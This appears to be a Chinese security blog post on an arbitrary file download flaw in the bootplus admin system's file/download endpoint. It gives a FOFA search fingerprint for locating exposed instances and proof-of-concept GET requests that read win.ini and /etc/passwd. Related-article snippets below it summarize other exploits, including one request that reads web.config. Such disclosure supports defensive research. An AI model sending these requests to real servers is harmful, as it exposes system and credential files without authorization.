bootplus管理系统 file/download 任意文件下载漏洞

于 2025-02-14 19:37:08 发布
阅读量201 收藏
点赞数
分类专栏: 漏洞复现2025专题 文章标签: 安全 web安全 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/shelter1234567/article/details/145640497
版权

bootplus管理系统 file/download 任意文件下载漏洞

漏洞描述

        bootplus是基于SpringBoot + Shiro + MyBatisPlus的,拥有接口管理,权限管理,监控组件等功能的一体化权限管理框架。该项目中的file/download接口存在任意文件下载漏洞, 攻击者可以通过该漏洞下载查看目标系统的任意文件。

威胁等级: 高危

漏洞分类: 任意文件读取

涉及厂商及产品:bootplus

是否开源:是

应用指纹及检出思路

匹配源代码/statics/css/admin/AdminLTE.min.css 即可

fofa : body="/statics/css/admin/AdminLTE.min.css"

漏洞复现

GET /file/download?name=C://windows/win.ini&real=1 HTTP/1.1
Host: 127.0.0.1:8090 

GET /file/download?name=/etc/passwd&real=1

了解本专栏 订阅专栏 解锁全文 超级会员免费看
漏洞复现】某检测系统(admintool)接口任意文件上传漏洞
李火火的安全圈
12-27 947
本检测信息管理系统能够实现检验工作的计算机化和网络化管理,基本实现检测数据的自动采集 确保检验数据的公正性、科学性和准确性,确保检验报告的规范性和权威性,确保检验工作的高效率和服务的及时性, admintool 接口存在任意文件上传漏洞
浙大恩特客户资源管理系统任意文件上传漏洞复现
0xSec
11-10 1821
浙大恩特客户资源管理系统fileupload.jsp、CustomerAction.entphone、MailAction.entphone、machord_doc.jsp等接口处存在文件上传漏洞,未经身份认证的攻击者可以上传任意后门文件,最终可导致服务器失陷。
ThinkPHP5远程命令执行漏洞
wkend的博客
01-02 1万+
0x01 ThinkPHP简介 ThinkPHP是一个基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布。从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,注重开发体验和易用性,为web应用开发提供了强有力的支持。 0x02 漏洞简介 (1)漏洞名称 ThinkPHP5远程命令执行 (2)漏洞描述 由于ThinkPHP5框架对控制器名没有进行足够的安...
渗透测试中遇到的Adminer任意文件读取漏洞
网安君的博客
01-17 7227
在某次做项目的时候遇到一个mysql.php,打开发现是adminer,网上搜到任意文件读取复现的时候,用了网上很多的python脚本都无法运行起来(例如:https://github.com/allyshka/Rogue-MySql-Server)。在GitHub找到一个可以运行的脚本,原理是模拟mysql的运行。
day17 个人博客项目&TP框架&路由访问&安全写法&历史漏洞
wanjia01的博客
06-04 1089
#知识点:1、基于TP框架入门安装搭建使用2、基于TP框架内置安全写法评估3、基于TP框架实例源码安全性评估TP框架开发的CMS#实例-CMS源码-EyouCMS&Fastadmin&YFCMFAdminLTE后台管理系统layui后台管理系统thinkcmfH-ui.admin后台管理系统tpshopFsatAdmineyoucmsLarryCMS后台管理系统tpadmin后台管理系统snake后台管理系统ThinkSNSDolphinPHP后台管理系统WeMall商城系统CLTPHP齐博CMSDSMAL
AdminLTE - 免费的管理仪表盘模板
最新发布
gitblog_07495的博客
09-13 389
AdminLTE - 免费的管理仪表盘模板 AdminLTE ColorlibHQ/AdminLTE: AdminLTE 是一个基于Bootstrap 4/5构建的开源后台管理模板,提供了丰富的UI组件、布局样式以及响应式设计,用于快速搭建美观且功能齐全的Web管理界面。 ...
一米OA漏洞学习——getfile.jsp 任意文件读取漏洞
记录并分享学习安全的知识点..
05-02 1843
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、概述
任意文件查看与下载漏洞
qq_57307348的博客
02-22 3914
任意文件查看与下载漏洞 一些网站的业务需求,可能提供文件查看或下载功能,如果对用户查看或下载的文件不做限制,就能够查看或下载任意的文件,可以是源代码文件,敏感文件等等 形成漏洞的原因 存在读取文件的函数 读取文件的路径用户可控且未校验或校验不严格 输出了文件内容 漏洞危害 下载服务器任意文件,包含脚本代码文件,系统敏感文件等,可以配合其他类型的漏洞,进一步代码审计,查找更多可利用的代码 漏洞的分类 任意文件的读取 任意文件下载 任意文件的读取 查看源代码
智明OA漏洞学习——EmailDownload.ashx 任意文件下载漏洞
记录并分享学习安全的知识点..
05-02 7515
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞复现 验证poc如下: 一、概述 智明 SmartOA EmailDownload.ashx文件存在任意文件下载漏洞,通过漏洞下载服务器上的敏感文件,查看敏感信息。 二、影响版本 智明SmartOA产品,影响版本不详。 三、漏洞复现 验证poc如下: /file/EmailDownload.ashx?url=~/web.config&name=w...
任意文件下载漏洞
Lemon's blog
10-24 1万+
前言: 之前没有接触过这个知识,恰好这次有一道题考了这方面的知识,就来详细的学习一下任意文件下载漏洞
vue2-admin-lte:adminLTE到vuejs v2.x转换项目
02-01
vue2-admin-lte() 基于Vuejs 2.x前端框架的Admin控制面板模板的AdminLTE。 文献资料 演示构建设置 # install dependencies npm install # serve with hot reload at localhost:8080 npm run dev # build for production with minification npm run build # build for production and view the bundle analyzer report npm run build --report # run unit tests: coming soon # npm run unit # run e2e tests: coming soon # npm run e2e # run all tests: coming soon # npm test 如何使用 首先,通过npm安装vue2-admin-lte 。 $ npm i --save vue2-admin-lte 在webpack中追加别名配
常见Web安全漏洞
Spontaneous_0的博客
03-17 1217
常见Web安全漏洞
ThinkPHP5远程代码执行漏洞
weixin_50464560的博客
08-15 4177
https://zhuanlan.zhihu.com/p/52173644 2018年12月10日,白帽汇安全研究院发现thinkphp官网发布了安全更新,修复了一个远程代码执行漏洞,该漏洞是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。主要影响的版本为5.0.23和5.1.31之前的所有版本。此次爆出漏洞的ThinkPHP 5.x版本是官方于2015年发布的新一代框架,其中5.1.0RC版本于今年的5月2日发布,但在短短几个月时间内就爆出远程代码执行漏洞
Springboot-Plus框架快速生成
坚强的博客
07-29 912
Springboot-Plus框架快速生成
AdminEAP框架-基于AdminLTE的权限管理
jrn1012的专栏
01-05 1万+
AdminEAP框架 1、概述AdminEAP为本人基于AdminLTE改造的后台管理框架,包含了基本的系统管理功能和各种交互demo,项目已经开源到Github,并部署到阿里云。Github : https://github.com/bill1012/AdminEAPAdminEAP DEMO: http://www.admineap.com本文讲述AdminEAP框架中的权限管理功能,基于RBA
纯干货!一个白帽子挖漏洞经验细致分享
热门推荐
大方子
10-05 2万+
不知道是不是很多人和我一样,每天刷着漏洞,看着自己的排名一位一位的往上提升,但是,但是。总感觉怪怪的,为什么别人刷的漏洞都是现金,而自己刷的漏洞都是给库币。别人一天为什么提交那么多漏洞,都是高危。而自己挖了一天也不见得会超过五个十个之类的,还被评为低危。为什么?你问我为什么,难道你心里还没有一点数么?   讲讲自己的套路!看的上的可以借鉴,看不上的,请自便吧! 请注意,以下所涉及的工具,请百...
AdminLTE的使用
海阔天空,在勇敢以后
04-11 4646
AdminLTE的使用
rce漏洞 远程代码执行 简介
whatday的专栏
09-02 7519
0x00 远程代码执行 - 介绍 1)什么是远程代码执行 远程命令执行 英文名称:RCE (remote code execution),简称RCE漏洞,是指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。 2)远程代码执行的特点 远程代码执行...
ThinkPHP5RCE漏洞复现
不想当脚本小子的脚本小子
06-10 1084
又到了闲来无事的漏洞复现时间~~~ ThinkPHP RCE漏洞是由于变量覆盖而引起的,漏洞源于可以对thinkphp/library/think/Request.php文件中的method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致RCE,其攻击点较为多,有些还具有限制条件,另外该漏洞在利用上会出现一些问题。 漏洞影响范围:<= 5.0.23、<= 5.1.32。 ...
在线文件管理与统计系统源码免费下载
根据给定的信息,我们可以提取出关于文件管理系统源码下载的知识点。首先,我们从标题和描述中获取到的关键信息来展开详细说明。 ### 文件管理系统源码下载 #### 系统概述 文件管理系统是一种软件应用,用于创建、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

昵称还在想呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值